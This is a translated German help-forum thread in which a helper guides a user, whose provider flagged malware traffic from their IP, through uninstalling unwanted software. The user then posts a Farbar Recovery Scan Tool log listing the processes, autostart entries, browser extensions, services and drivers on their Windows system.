
Log analysis and evaluation: UPC reports: viruses, worms are being sent via my IP

Windows 7 If you have caught a trojan or keep getting virus warnings, you can post the logs from our diagnostic tools here for evaluation by our experts. To be able to remove viruses and trojans, the infected system must first be examined: First steps for help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.

04.08.2017, 18:23   #16
Lost_Viking
 



*up*

04.08.2017, 22:17   #17
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 



A lot of junk has to come off, though. Partly old versions, and another part is a whole lot of useless junk, including Avira. Get rid of all of it. Alternatives will be named once we are done here.


Let me know when Avira is gone; once we are done here you can switch to another virus scanner, information will follow in the final post. Please do NOT install anything from NOW on without checking with us first!


Please download Revo Uninstaller from here: Download Revo Uninstaller (alternatively, portable Revo Uninstaller).
  • Install and start the program. (Illustrated guide to Revo Uninstaller)
  • Click on Options and select German as the language.
  • In the uninstaller field, search for the programs:

    7-Zip 9.20 (x64 edition)
    Adobe Acrobat Reader DC - Deutsch
    Advanced SystemCare 10
    Avira Antivirus
    Avira Connect
    Avira Phantom VPN
    Avira Software Updater
    Avira System Speedup
    Driver Booster 4.4

  • Select the programs one after another and click Uninstall each time.
  • Then select the "Moderat" mode.
  • Remove leftovers:
    Click on then on and then on .

 


06.08.2017, 00:27   #18
Lost_Viking
 



All right. I have uninstalled the programs mentioned.

With the uninstaller I noticed that I still had many other unnecessary or no longer used programs on it. So I just uninstalled those as well.

Here are the new logs in case they are needed. They should also be clearer now after the cleanup.

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017
durchgeführt von **** (Administrator) auf SILENTDRAGON (06-08-2017 01:14:07)
Gestartet von C:\Users\****\Desktop
Geladene Profile: **** (Verfügbare Profile: ****)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe
(Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
(Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
() C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Users\****\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
HKLM-x32\...\Winlogon: [Userinit] 
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1918696 2017-05-08] (TomTom)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\****\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\****\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-02-03]
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\simplicheck.lnk [2017-05-06]
ShortcutTarget: simplicheck.lnk -> C:\Program Files (x86)\simplitec\simplicheck\simplicheck.exe (Keine Datei)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UE Music Library-Taskleisten-Tool.lnk [2016-05-04]
ShortcutTarget: UE Music Library-Taskleisten-Tool.lnk -> C:\Program Files (x86)\Logitech\UE Music Library\UEMLTray.exe (Keine Datei)
Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-05]
ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation)

FireFox:
========
FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-06]
FF Extension: (Avira Browser Safety) - C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-06]
CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (© pdfforge GmbH.)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\****\Downloads\pcmechanicpm.exe
2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-08-05 23:13 - 2017-08-05 23:13 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****)
2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-08-05 00:32 - 2017-08-05 00:32 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-04 22:53 - 2017-08-05 02:38 - 000000000 ____D C:\Users\****\.junique
2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\****\.minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\AppData\Roaming\gg.minion.Minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\.oracle_jre_usage
2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\****\Desktop\Minion3.0.5.exe
2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\****\Documents\Minion.lnk
2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC
2017-08-01 15:04 - 2017-08-01 15:36 - 000122733 _____ C:\Users\****\Desktop\Addition.txt
2017-08-01 15:01 - 2017-08-06 01:14 - 000024036 _____ C:\Users\****\Desktop\FRST.txt
